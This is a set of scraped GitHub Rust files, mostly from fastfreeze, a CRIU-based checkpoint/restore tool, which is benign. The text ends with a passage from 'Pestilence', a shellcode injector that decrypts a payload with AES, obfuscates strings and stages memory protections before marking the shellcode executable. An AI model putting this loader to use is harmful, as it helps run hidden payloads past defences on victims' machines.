tar to complete successfully. But if tar errors, // we want to report the errors of tar and all other processes involved. // The easiest way to use the process group. pgrp.get_mut(untar_ps).wait()?; // wait for tar to finish pgrp.try_wait_for_success()?; // if tar errored, this is where we exit. debug!("Filesystem restored"); // Because the tar command can be overridden by the user via TAR_CMD, // it may consume many pids. Later, when we invoke the "criu restore" tool, // we must ensure that its PID is lower than APP_ROOT_PID, otherwise it could // clash with itself. // We set ns_last_pid to APP_ROOT_PID-100 to balance performance and safety: // too low, and we might have to do a PID round trip over pid_max, too high and // we risk set_ns_last_pid and criu to go over APP_ROOT_PID if they are invoked via // bash scripts that do interesting things. // Note that later, we check that criu's pid is indeed lower than APP_ROOT_PID. set_ns_last_pid(APP_ROOT_PID-100)?; // The file system is back, including the application configuration containing user-defined // preserved-paths, and application time offset. // We load the app config, add the new preserved_paths, and save it. // It will be useful for the subsequent checkpoints. // Also, we keep the passphrase_file setting if there's one to ensure that // a previously encrypted image remains encrypted. This is normally unecessary, because // if the image was in fact encrypted, we would be using a passphrase_file already. let (duration_since_checkpoint, previously_inherited_resources) = { let old_config = AppConfig::restore()?; preserved_paths.extend(old_config.preserved_paths); let passphrase_file = passphrase_file.or(old_config.passphrase_file); let previously_inherited_resources = old_config.inherited_resources; let current_inherited_resources = criu::InheritableResources::current()?; ensure!(previously_inherited_resources.compatible_with(&current_inherited_resources), "Cannot match the original application file descriptors patterns. \ Try again by connecting file descriptors such that they are grouped in a similar manner. \n\ Original file descriptors: {:#?},\n\ Current file descriptors: {:#?}", previously_inherited_resources.0, current_inherited_resources.0); let config = AppConfig { image_url: image_url.to_string(), preserved_paths, passphrase_file, created_at: SystemTime::now(), app_clock: old_config.app_clock, inherited_resources: current_inherited_resources, }; config.save()?; // old_config.created contains the date when checkpoint happened. // It is a wall clock time coming from another machine. // The duration between restore and checkpoint can therefore be inaccurate, and negative. // we'll clamp these negative values to 0. let restore_started_at = SystemTime::now() - START_TIME.elapsed(); let duration_since_checkpoint = restore_started_at.duration_since(old_config.created_at) .unwrap_or_else(|_| Duration::new(0,0)); debug!("Duration between restore and checkpoint: {:.1}s", duration_since_checkpoint.as_secs_f64()); // Adjust the libtimevirt offsets // Note that we do not add the duration_since_checkpoint to the clock. // The man page of clock_gettime(2) says that CLOCK_MONOTONIC "does not // count time that the system is suspended." // The man page says that CLOCK_BOOTTIME is supposed to be the one that // includes the duration when the system was suspended. // For now, we don't worry much about the semantics of CLOCK_BOOTTIME. // Rare are the applications that use it. debug!("Application clock: {:.1}s", Duration::from_nanos(old_config.app_clock as u64).as_secs_f64()); virt::time::ConfigPath::default().adjust_timespecs(old_config.app_clock)?; (duration_since_checkpoint, previously_inherited_resources) }; // We start the ns_last_pid daemon here. Note that we join_as_daemon() instead of join(), // this is so we don't wait for it in wait_for_success(). debug!("Starting set_ns_last_pid server"); spawn_set_ns_last_pid_server()? .join_as_daemon(&mut pgrp); debug!("Continuing reading image in memory..."); // `check_pgrp_err()` is useful to report the process group error, // which is a more interesting error to report than the error of wait_for_stats(), // (which would typically be a pipe read error) let mut check_pgrp_err = |err| { if let Err(e) = pgrp.try_wait_for_success() { e } else { err } }; let stats = img_streamer.progress.wait_for_stats() .map_err(&mut check_pgrp_err)?; stats.show(); // Wait for the CRIU socket to be ready. img_streamer.progress.wait_for_socket_init() .map_err(&mut check_pgrp_err)?; // Restore application processes. // We become the parent of the application as CRIU is configured to use CLONE_PARENT. debug!("Restoring processes"); criu::criu_restore_cmd(leave_stopped, &previously_inherited_resources) .enable_stderr_logging("criu") .spawn() .and_then(|ps| { ensure!(ps.pid() < APP_ROOT_PID, "CRIU's pid is too high: {}", ps.pid()); Ok(ps) })? .join(&mut pgrp); // Wait for all our all our monitored processes to finish. // If there's an issue, kill the app if it's still laying around. // We might want to check that we are the parent of the process with pid APP_ROOT_PID, // otherwise, we might be killing an innocent process. But that would be racy anyways. if let Err(e) = pgrp.wait_for_success() { let _ = kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGKILL); return Err(e); } info!("Application is ready, restore took {:.1}s", START_TIME.elapsed().as_secs_f64()); Ok((stats, duration_since_checkpoint)) } fn run_from_scratch( image_url: ImageUrl, preserved_paths: HashSet<PathBuf>, passphrase_file: Option<PathBuf>, app_cmd: Vec<OsString>, ) -> Result<()> { let inherited_resources = criu::InheritableResources::current()?; let config = AppConfig { image_url: image_url.to_string(), preserved_paths, passphrase_file, app_clock: 0, created_at: SystemTime::now(), inherited_resources, }; config.save()?; virt::time::ConfigPath::default().write_intial()?; virt::enable_system_wide_virtualization()?; ensure!(!app_cmd.is_empty(), "Error: application command must be specified"); let mut cmd = Command::new(app_cmd); if let Some(path) = std::env::var_os("FF_APP_PATH") { cmd.env_remove("FF_APP_PATH") .env("PATH", path); } if let Some(library_path) = std::env::var_os("FF_APP_LD_LIBRARY_PATH") { cmd.env_remove("FF_APP_LD_LIBRARY_PATH") .env("LD_LIBRARY_PATH", library_path); } cmd.env("FASTFREEZE", "1"); // We don't set the application in a process group because we want to be // compatible with both of these usages: // * "cat | fastfreeze run cat": the first cat must be in the process group // controlling the terminal to receive input // * "fastfreeze run cat": the cat here must be in the process group // controlling the terminal // We don't want to create a new process group as this would remove any // hopes in making both scenarios work well. // If we reparent orphans of the application, they will be invisible from CRIU // when it tries to checkpoint the application. That's bad. Instead, we make sure // the application root process reparents the orphans. cmd.set_child_subreaper(); cmd.spawn_with_pid(APP_ROOT_PID)?; info!("Application is ready, started from scratch"); Ok(()) } pub enum RunMode { Restore { img_manifest: ImageManifest }, FromScratch, } pub fn determine_run_mode(store: &dyn Store, allow_bad_image_version: bool) -> Result<RunMode> { let fetch_result = with_metrics("fetch_manifest", || ImageManifest::fetch_from_store(store, allow_bad_image_version), |fetch_result| match fetch_result { ManifestFetchResult::Some(_) => json!({"manifest": "good", "run_mode": "restore"}), ManifestFetchResult::VersionMismatch {..} => json!({"manifest": "version_mismatch", "run_mode": "run_from_scratch"}), ManifestFetchResult::NotFound => json!({"manifest": "not_found", "run_mode": "run_from_scratch"}), } )?; Ok(match fetch_result { ManifestFetchResult::Some(img_manifest) => { debug!("Image manifest found: {}", img_manifest); RunMode::Restore { img_manifest } } ManifestFetchResult::VersionMismatch { fetched, desired } => { info!("Image manifest found, but has version {} while the expected version is {}. \ You may try again with --allow-bad-image-version. \ Running application from scratch", fetched, desired); RunMode::FromScratch } ManifestFetchResult::NotFound => { debug!("Image manifest not found, running application from scratch"); RunMode::FromScratch } }) } fn ensure_non_conflicting_pid() -> Result<()> { // We don't want to use a PID that could be potentially used by the // application when being restored. if std::process::id() > APP_ROOT_PID as u32 { // We should be pid=1 in a container, so this code block only applies when running // outside of a container. set_ns_last_pid(MIN_PID)?; bail!("Current pid is too high. Re-run the same command again."); } Ok(()) } fn do_run( image_url: ImageUrl, app_args: Option<Vec<OsString>>, preserved_paths: HashSet<PathBuf>, tcp_listen_remaps: Vec<String>, passphrase_file: Option<PathBuf>, no_restore: bool, allow_bad_image_version: bool, leave_stopped: bool, ) -> Result<()> { // Holding the `with_checkpoint_restore_lock` lock (done by caller) while // invoking any process (e.g., `criu_check_cmd`) is preferrable to avoid // disturbing another instance of FastFreeze trying to do PID control. criu::criu_check_cmd() .enable_stderr_logging("criu-check") .spawn()? .wait_for_success()?; ensure_non_conflicting_pid()?; // We prepare the store for writes to speed up checkpointing. Notice that // we also prepare the store during restore, because we want to make sure // we can checkpoint after a restore. trace!("Preparing image store"); let store = image_url.store(); store.prepare(true)?; let run_mode = if no_restore { debug!("Running app from scratch (--no-restore)"); RunMode::FromScratch } else { debug!("Fetching image manifest for {}", image_url); determine_run_mode(&*store, allow_bad_image_version) .context(ExitCode(EXIT_CODE_RESTORE_FAILURE))? }; match (run_mode, app_args) { (RunMode::Restore { img_manifest }, _) => { let shard_download_cmds = shard::download_cmds( &img_manifest, passphrase_file.as_ref(), &*store)?; with_metrics("restore", || restore( image_url, preserved_paths, tcp_listen_remaps, passphrase_file, shard_download_cmds, leave_stopped ).context(ExitCode(EXIT_CODE_RESTORE_FAILURE)), |(stats, duration_since_checkpoint)| json!({ "stats": stats, "duration_since_checkpoint_sec": duration_since_checkpoint.as_secs_f64(), }) )?; } (RunMode::FromScratch, None) => bail!("No application to restore, but running in restore-only mode, aborting"), (RunMode::FromScratch, Some(app_args)) => { let app_args = app_args.into_iter().map(|s| s.into()).collect(); with_metrics("run_from_scratch", || run_from_scratch(image_url, preserved_paths, passphrase_file, app_args), |_| json!({}))?; } } Ok(()) } fn default_image_name(app_args: &[OsString]) -> Result<String> { use std::collections::hash_map::DefaultHasher; use std::hash::{Hash, Hasher}; fn program_name(cmd: &OsString) -> Result<String> { Ok(Path::new(cmd) .file_name().ok_or_else(|| anyhow!("Failed to determine program name from command name. \ Please use `--image-url` to specify the image URL"))? .to_string_lossy().into_owned()) } Ok(match app_args { [] => unreachable!(), [app_name] => program_name(app_name)?, _ => { let hash = { let mut hasher = DefaultHasher::new(); app_args.hash(&mut hasher); hasher.finish() }; format!("{}-{:04x}", program_name(&app_args[0])?, hash & 0xFFFF) } }) } impl super::CLI for Run { fn run(self) -> Result<()> { let inner = || -> Result<()> { let Self { image_url, app_args, on_app_ready_cmd, no_restore, allow_bad_image_version, passphrase_file, preserved_paths, tcp_listen_remap, leave_stopped, verbose: _, app_name, no_container } = self; // We allow app_args to be empty. This indicates a restore-only mode. let app_args = if app_args.is_empty() { info!("Running in restore-only mode as no command is given"); None } else { ensure!(!app_args[0].is_empty(), "Empty command given"); Some(app_args) }; let image_url = match (image_url, app_args.as_ref()) { (Some(image_url), _) => image_url, (None, None) => bail!("--image-url is necessary when running in restore-only mode"), (None, Some(app_args)) => { let image_path = DEFAULT_IMAGE_DIR.join(default_image_name(app_args)?); let image_url = format!("file:{}", image_path.display()); info!("image-url is {}", image_url); image_url } }; let image_url = ImageUrl::parse(&image_url)?; let nscaps = container::ns_capabilities()?; // Note: the following may fork a child to enter the new PID namespace, // The parent will be kept running to monitor the child. // The execution continues as the child process. use container::NSCapabilities as Cap; match (app_name, no_container, &nscaps, install::is_ff_installed()?) { (Some(_), true, _, _ ) => bail!("--app-name and --no-container are mutually exclusive"), (_, true, _, false) => bail!("`fastfreeze install` must first be ran"), (Some(name), false, Cap::Full, _) => container::create(&name)?, (None, false, Cap::Full, _) => container::create(image_url.image_name())?, (Some(_), false, _, _) => bail!("--app-name cannot be used as PID namespaces are not available"), (None, false, Cap::MountOnly, false) => container::create_without_pid_ns()?, (None, false, Cap::None, false) => bail!("`fastfreeze install` must first be ran \ as namespaces are not available"), (None, _, _, true) => {}, }; if let Some(ref passphrase_file) = passphrase_file { check_passphrase_file_exists(passphrase_file)?; } let preserved_paths = preserved_paths.into_iter().collect(); with_checkpoint_restore_lock(|| do_run( image_url, app_args, preserved_paths, tcp_listen_remap, passphrase_file, no_restore, allow_bad_image_version, leave_stopped))?; if let Some(on_app_ready_cmd) = on_app_ready_cmd { // Fire and forget. Command::new_shell(&on_app_ready_cmd) .spawn()?; } let app_exit_result = monitor_child(Pid::from_raw(APP_ROOT_PID)); if app_exit_result.is_ok() { info!("Application exited with exit_code=0"); } // The existance of the app config indicates if the app may b // running (see is_app_running()), so it's better to take it out. if let Err(e) = AppConfig::remove() { error!("{}, but it's okay", e); } app_exit_result }; // We use `with_metrics` to log the exit_code of the application and run time duration with_metrics_raw("run", inner, |result| match result { Ok(()) => json!({ "outcome": "success", "exit_code": 0, }), Err(e) => json!({ "outcome": "error", "exit_code": ExitCode::from_error(&e), "error": format!("{:#}", e), }).merge(metrics_error_json(e)) } ) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/checkpoint.rs
src/cli/checkpoint.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ collections::HashSet, path::PathBuf, time::{SystemTime, Duration}, }; use nix::{ poll::{PollFd, PollFlags}, sys::signal, unistd::Pid, }; use structopt::StructOpt; use serde::Serialize; use crate::{ consts::*, store::ImageUrl, container, image::{ImageManifest, CpuBudget, shard, check_passphrase_file_exists}, process::{Command, ProcessExt, ProcessGroup, Stdio}, metrics::{with_metrics, emit_metrics}, util::poll_nointr, image_streamer::{Stats, ImageStreamer}, lock::with_checkpoint_restore_lock, signal::{kill_process_tree, get_proc_state}, criu, filesystem, virt, }; use super::run::AppConfig; /// Perform a checkpoint of the running application #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt(after_help("\ ENVS: FF_METRICS_RECORDER When specified, FastFreeze invokes the specified program to report metrics. The metrics are formatted in JSON and passed as first argument CRIU_OPTS Additional arguments to pass to CRIU, whitespace separated S3_CMD Command to access AWS S3. Defaults to 'aws s3' GS_CMD Command to access Google Storage. Defaults to 'gcsthin' TAR_CMD Command to tar the file system. Defaults to 'tar'" ))] pub struct Checkpoint { /// Image URL, defaults to the value used during the run command #[structopt(short, long)] image_url: Option<String>, /// Dir/file to include in the image in addition to the ones specified during the run command. /// May be specified multiple times. Multiple paths can also be specified colon separated. // require_delimiter is set to avoid clap's non-standard way of accepting lists. #[structopt(long="preserve-path", name="path", require_delimiter=true, value_delimiter=":")] preserved_paths: Vec<PathBuf>, /// Leave application running after checkpoint #[structopt(long)] leave_running: bool, /// Level of parallelism. Split the image in multiple shards. // We use a default of 4 shards to benefit from some parallelism. // It should be set to something related to the number of CPUs available. #[structopt(long, default_value="4")] num_shards: u32, /// Amount of CPU at disposal. Possible values are [low, medium, high]. /// Currently, `low` skips compression, `medium` uses lz4, and /// `high` uses zstd. #[structopt(long, default_value="medium")] cpu_budget: CpuBudget, /// Enable image encryption. This points to a file containing a passphrase /// used to encrypt the image. The passphrase should contain at least 256 bits /// of entropy. #[structopt(long)] passphrase_file: Option<PathBuf>, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Checkpoint the specified application. See the run command help about /// --app-name for more details. #[structopt()] app_name: Option<String>, } pub fn do_checkpoint(opts: Checkpoint) -> Result<Stats> { let Checkpoint { image_url, num_shards, cpu_budget, passphrase_file, preserved_paths, leave_running, app_name: _, verbose: _, } = opts; // We override TMPDIR with a safe location. The uploader (or metrics CLI) // may create a tmp file (e.g., bash script using here documents). This // would cause tar to fail as it detects changes in /tmp. // `NO_PRESERVE_FF_DIR` is excluded from the list of paths to preserve. std::env::set_var("TMPDIR", &*NO_PRESERVE_FF_DIR); let mut preserved_paths: HashSet<_> = preserved_paths.into_iter().collect(); let config = AppConfig::restore()?; // If the image_url is not supplied, we use the one that we stashed during // the run operation. let image_url = ImageUrl::parse(&image_url.unwrap_or(config.image_url))?; // As for preserved_paths, we join all the paths we know of. // There is the downside of not being able to forget a path that was once preserved. // The upside is that is less prone to bugs for users. preserved_paths.extend(config.preserved_paths); // For the passphrase_file, we take the one provided, or the one specified in // a previous operation. This means that once we use encryption, there is no // way to go back to using no encryption. // Note that if the passphrase file is contained in the preserved_paths, // we'll include it. It would be a little odd, but not necessarily harmful. // We won't emit a warning if that's the case. let passphrase_file = passphrase_file.or(config.passphrase_file); if let Some(ref passphrase_file) = passphrase_file { check_passphrase_file_exists(passphrase_file)?; } // The manifest contains the name of the shards, which are generated at random. // We combine it with the store to generate the shard upload commands. // A shard upload command is of the form: // "lz4 -1 - - | aws s3 cp - s3://bucket/img/XXXXXX.ffs" let img_manifest = ImageManifest::new( num_shards, passphrase_file.is_some(), cpu_budget.into()); let store = image_url.store(); store.prepare(true)?; let shard_upload_cmds = shard::upload_cmds( &img_manifest, passphrase_file.as_ref(), &*store)?; // We emit a "checkpoint_start" event to make it easier to track down // containers that vanish during checkpoints. We don't wait for the metrics // process to complete, it would delay checkpointing. let _metrics_p_reaper = { let event = json!({"action": "checkpoint_start", "image_url": image_url.to_string()}); emit_metrics(event)?.map(|p| p.reap_on_drop()) }; info!("Checkpointing application to {} ({})", image_url, img_manifest); if let Some(ref passphrase_file) = passphrase_file { info!("Encrypting image with passphrase from file {}", passphrase_file.display()); } // `pgrp` monitors all our child processes. If one fails, the whole group fails let mut pgrp = ProcessGroup::new()?; let mut img_streamer = ImageStreamer::spawn_capture(num_shards as usize)?; img_streamer.process.join(&mut pgrp); // Spawn the upload processes connected to the image streamer's output for (i, (upload_cmd, shard_pipe)) in shard_upload_cmds.into_iter().zip(img_streamer.shard_pipes).enumerate() { Command::new_shell(&upload_cmd) .stdin(Stdio::from(shard_pipe)) .enable_stderr_logging(format!("upload shard {}", i+1)) .spawn()? .join(&mut pgrp); } // Wait for the imager socket to be ready. img_streamer.progress.wait_for_socket_init()?; // Spawn the CRIU dump process. CRIU sends the image to the image streamer. // CRIU will leave the application in a stopped state when done, // so that we can continue tarring the filesystem. let criu_ps = criu::criu_dump_cmd() .enable_stderr_logging("criu") .spawn()? .join_as_non_killable(&mut pgrp); // From now on, we want to SIGCONT the application if and if only the CRIU // process succeeds. If it failed, it's CRIU's responsability to resume the app. // In the case that CRIU didn't resume the app, it would be unsafe to let // the application run as it might be in an incorrect state (e.g., having // CRIU's parasite still installed). // If the CRIU process succeeded (but the upload streams failed), we still // want to resume the application. // Extract certain fields upfront to avoid compile error due to use of // partial values borrowed in the following closure let inherited_resources = config.inherited_resources; let mut img_streamer_progress = img_streamer.progress; let img_streamer_tar_fs_pipe = img_streamer.tar_fs_pipe; let stats = || -> Result<Stats> { // We want to start dumping the file system ASAP, but we must wait for the // application to be stopped by CRIU, otherwise the filesystem might still // be changing under us. We wait for the "checkpoint-start" message from the // streamer progress pipe. // We must also check for the CRIU process, otherwise, we could hang forever while pgrp.try_wait_for_success()? { let mut poll_fds = pgrp.poll_fds(); poll_fds.push(PollFd::new(img_streamer_progress.fd, PollFlags::POLLIN)); let timeout = -1; poll_nointr(&mut poll_fds, timeout)?; // Check if we have something to read on the progress pipe. // unwrap() is safe. We had pushed a value in the vector. let streamer_poll_fd = poll_fds.last().expect("missing streamer poll_fd"); // unwrap() is safe: we assume the kernel returns valid bits in `revents`. if !streamer_poll_fd.revents().expect("revents invalid").is_empty() { img_streamer_progress.wait_for_checkpoint_start()?; break; } } debug!("Checkpoint started, application is frozen"); { // We save the current time of the application so we can resume time // where we left off. The time config file goes on the file system. // We also save the image_url and preserved paths. let app_clock = virt::time::ConfigPath::default().read_current_app_clock()?; ensure!(app_clock >= 0, "Computed app clock is negative: {}ns", app_clock); debug!("App clock: {:.1}s", Duration::from_nanos(app_clock as u64).as_secs_f64()); let config = AppConfig { image_url: image_url.to_string(), preserved_paths: preserved_paths.clone(), passphrase_file, app_clock, // Ideally, we want the clock time once the checkpoint has ended, // but that would be a bit difficult. We could though. // It would involve adding the config.json as an external file // into to the streamer (like fs.tar), and stream it at the very end. // For now, we have the time at which the checkpoint started. created_at: SystemTime::now(), inherited_resources, }; config.save()?; } // We dump the filesystem with tar. The stdout of tar connects to // criu-image-streamer, which incorporates the tarball into the checkpoint // image. // Note that CRIU can complete at any time, but it leaves the application in // a stopped state, so the filesystem remains consistent. debug!("Dumping filesystem"); let tar_ps = filesystem::tar_cmd(preserved_paths, img_streamer_tar_fs_pipe.unwrap()) .enable_stderr_logging("tar") .spawn()? .join(&mut pgrp); pgrp.get_mut(tar_ps).wait()?; // wait for tar to finish pgrp.try_wait_for_success()?; // if tar errored, this is where we exit // We print this debug message so that in the logs, we can have a timestamp // to tell us how long it took. Maybe it would be better to have a metric event. debug!("Filesystem dumped. Finishing dumping processes"); // Wait for checkpoint to complete pgrp.wait_for_success()?; let stats = img_streamer_progress.wait_for_stats()?; stats.show(); Ok(stats) }().map_err(|e| { // Something went sideways while checkpointing (reading the file system? // uploading the image?). if pgrp.terminate().is_ok() && pgrp.get_mut(criu_ps).wait().map_or(false, |r| r.success()) { // CRIU finished successfully, but checkpointing failed. // We SIGCONT the application to revert our state as we found it. debug!("Resuming application (checkpoint failed, criu ok)"); let _ = kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGCONT); } else { match get_proc_state(Pid::from_raw(APP_ROOT_PID)) { Ok('T') => { // STOPPED // CRIU failed due to an non-anticipated error. It did not resume // the application. We won't resume the app as it could be corrupted. warn!("CRIU may have failed unexpectedly. \ We'll assume the application state is corrupted (e.g., with parasite code)"); warn!("The application has been left SIGSTOP'ed. You may SIGKILL or SIGCONT it"); } Ok(_) => { // CRIU failed (most likely while writing the checkpoint image), // recovered, resumed the application, and bailed. debug!("Application resumed (checkpoint failed, criu failed)"); } Err(_) => warn!("The application state is unavailable, it is probably gone") }} e })?; if leave_running { debug!("Resuming application (leave running)"); kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGCONT) .context("Failed to resume application")?; } else { // We kill the app later, once metrics are emitted. } // At this point, all the shards are written successfully. We can now write // the manifest file to the store. The manifest file existence indicates // whether the image exists, so it must be written at the very end. debug!("Writing image manifest"); img_manifest.persist_to_store(&*store) .with_context(|| format!("Failed to upload image manifest at {}", image_url))?; info!("Checkpoint completed in {:.1}s", START_TIME.elapsed().as_secs_f64()); Ok(stats) } impl super::CLI for Checkpoint { fn run(self) -> Result<()> { container::maybe_nsenter_app(self.app_name.as_ref())?; // Holding the lock while invoking the metrics CLI is preferable to avoid // disturbing another instance trying to do PID control. with_checkpoint_restore_lock(|| { let leave_running = self.leave_running; with_metrics("checkpoint", || do_checkpoint(self), |stats| json!({"stats": stats}))?; // We kill the app after the metrics are emitted. Killing the app // risk terminating the container, preventing metrics from being emitted. if !leave_running { debug!("Killing application"); kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGKILL) .context("Failed to kill application")?; } Ok(()) }) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/extract.rs
src/cli/extract.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::path::PathBuf; use structopt::StructOpt; use serde::Serialize; use crate::{ consts::*, store::ImageUrl, image::{ManifestFetchResult, ImageManifest, shard, check_passphrase_file_exists}, process::{Command, ProcessExt, ProcessGroup, Stdio}, image_streamer::ImageStreamer, }; /// Extract a FastFreeze image to local disk #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt(after_help("\ ENVS: S3_CMD Command to access AWS S3. Defaults to 'aws s3' GS_CMD Command to access Google Storage. Defaults to 'gcsthin'" ))] pub struct Extract { /// Image URL, which can also be a regular local path image_url: String, /// Output directory where to extract the image. /// Defaults to the last path component of image-url. #[structopt(short, long)] output_dir: Option<PathBuf>, /// Allow restoring of images that don't match the version we expect. #[structopt(long)] allow_bad_image_version: bool, /// Provide a file containing the passphrase to be used for encrypting /// or decrypting the image. For security concerns, using a ramdisk /// like /dev/shm to store the passphrase file is preferable. #[structopt(long)] passphrase_file: Option<PathBuf>, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, } pub fn extract_image( shard_download_cmds: Vec<String>, output_dir: PathBuf, ) -> Result<()> { let num_shards = shard_download_cmds.len(); info!("Extracting image from {} shards", num_shards); let mut pgrp = ProcessGroup::new()?; let mut img_streamer = ImageStreamer::spawn_extract(num_shards, &output_dir)?; img_streamer.process.join(&mut pgrp); for (download_cmd, shard_pipe) in shard_download_cmds.into_iter().zip(img_streamer.shard_pipes) { Command::new_shell(&download_cmd) .stdout(Stdio::from(shard_pipe)) .spawn()? .join(&mut pgrp); } pgrp.wait_for_success()?; let stats = img_streamer.progress.wait_for_stats()?; stats.show(); info!("Image extracted to {}. Took {:.1}s", output_dir.display(), START_TIME.elapsed().as_secs_f64()); Ok(()) } impl super::CLI for Extract { fn run(self) -> Result<()> { let Self { image_url, output_dir, allow_bad_image_version, passphrase_file, verbose: _ } = self; let image_url = ImageUrl::parse(&image_url)?; let store = image_url.store(); store.prepare(false)?; let output_dir = output_dir .unwrap_or_else(|| PathBuf::from(image_url.image_name())); if let Some(ref passphrase_file) = passphrase_file { check_passphrase_file_exists(passphrase_file)?; } debug!("Fetching image manifest for {}", image_url); match ImageManifest::fetch_from_store(&*store, allow_bad_image_version)? { ManifestFetchResult::Some(img_manifest) => { debug!("Image manifest found: {}", img_manifest); let dl_cmds = shard::download_cmds( &img_manifest, passphrase_file.as_ref(), &*store)?; extract_image(dl_cmds, output_dir)?; } ManifestFetchResult::VersionMismatch { fetched, desired } => { bail!("Image manifest found, but has version {} while the expected version is {}. \ You may try again with --allow-bad-image-version", fetched, desired); } ManifestFetchResult::NotFound => { bail!("Image manifest not found"); } } Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/main.rs
src/cli/main.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use structopt::{StructOpt, clap::AppSettings}; use serde::Serialize; use crate::logger; use super::{ CLI, checkpoint::Checkpoint, extract::Extract, install::Install, run::Run, wait::Wait, }; #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt( // When showing --help, we want to keep the order of arguments as we defined, // as opposed to the default alphabetical order. global_setting(AppSettings::DeriveDisplayOrder), // help subcommand is not useful, disable it. global_setting(AppSettings::DisableHelpSubcommand), // subcommand version is not useful, disable it. global_setting(AppSettings::VersionlessSubcommands), )] #[structopt(after_help(" restore-only is achieved by using \ the `run` subcommand without passing the application command-line arguments" ))] pub struct Opts { #[structopt(subcommand)] command: Command, } #[derive(StructOpt, PartialEq, Debug, Serialize)] enum Command { Run(Run), Checkpoint(Checkpoint), Extract(Extract), Wait(Wait), Install(Install), } impl Opts { // It looks a bit silly not to have a global verbose option flag, but if we // use a global flag, then the user _must_ pass --verbose before the // subcommand, which is even more silly. // clap should be better fn verbosity(&self) -> u8 { match self.command { Command::Install(Install { verbose, .. }) | Command::Run(Run { verbose, .. }) | Command::Checkpoint(Checkpoint { verbose, .. }) | Command::Extract(Extract { verbose, .. }) | Command::Wait(Wait { verbose, .. }) => verbose, } } fn log_level(&self) -> logger::LevelFilter { match self.verbosity() { 0 => logger::LevelFilter::Info, 1 => logger::LevelFilter::Debug, _ => logger::LevelFilter::Trace, } } fn log_prefix(&self) -> &'static str { match self.command { Command::Install(_) => "install", Command::Run(_) => "run", Command::Checkpoint(_) => "checkpoint", Command::Extract(_) => "extract", Command::Wait(_) => "wait", } } fn use_log_file(&self) -> bool { // Persisting a log file is helpful to carry the history of the // application in the checkpointed image. matches!(self.command, Command::Run(_) | Command::Checkpoint(_) ) } pub fn init_logger(&self) -> Result<()> { logger::init(self.log_level(), self.log_prefix(), self.use_log_file()) } } impl CLI for Opts { fn run(self) -> Result<()> { match self.command { Command::Install(opts) => opts.run(), Command::Run(opts) => opts.run(), Command::Checkpoint(opts) => opts.run(), Command::Extract(opts) => opts.run(), Command::Wait(opts) => opts.run(), } } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
cr7pt0pl4gu3/Pestilence
https://github.com/cr7pt0pl4gu3/Pestilence/blob/67d23f30da113b687822405ec7729ab865f107ca/src/main.rs
src/main.rs
use std::env; use aes::{Aes128}; use cfb_mode::Cfb; use cfb_mode::cipher::{NewCipher, AsyncStreamCipher}; use windows::{Win32::System::Memory::*, Win32::System::SystemServices::*}; use ntapi::{ntmmapi::*, ntpsapi::*, ntobapi::*, winapi::ctypes::*}; use obfstr::obfstr; type Aes128Cfb = Cfb<Aes128>; pub struct Injector { shellcode: Vec<u8>, } impl Injector { pub fn new(shellcode: Vec<u8>) -> Injector { Injector { shellcode } } pub fn run_in_current_process(&mut self) { unsafe { let mut protect = PAGE_NOACCESS.0; let mut map_ptr: *mut c_void = std::ptr::null_mut(); // asking for more than needed, because we can afford it let mut sc_len = self.shellcode.len() * 5; NtAllocateVirtualMemory(NtCurrentProcess, &mut map_ptr, 0, &mut sc_len, MEM_COMMIT.0 | MEM_RESERVE.0, protect); custom_sleep(100); NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_READWRITE.0, &mut protect); custom_sleep(100); self.copy_nonoverlapping_gradually(map_ptr as *mut u8); NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_NOACCESS.0, &mut protect); custom_sleep(100); NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_EXECUTE.0, &mut protect); 